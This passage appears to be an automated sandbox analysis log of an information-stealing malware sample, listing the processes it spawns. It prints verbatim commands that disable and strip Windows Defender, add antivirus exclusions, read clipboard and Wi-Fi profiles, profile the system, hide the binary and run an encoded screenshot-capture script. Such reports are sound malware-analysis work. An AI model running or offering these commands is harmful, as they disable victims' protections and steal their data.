                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\ProgramData\Microsoft\svchost.exeThread register set: target process: 4460
                Source: C:\ProgramData\Microsoft\svchost.exeThread register set: target process: 7756
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                Source: C:\Users\user\Desktop\47SXvEQ.exeProcess created: C:\Users\user\AppData\Local\Temp\instals.exe "C:\Users\user\AppData\Local\Temp\instals.exe" Jump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe""Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: unknown unknown
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand 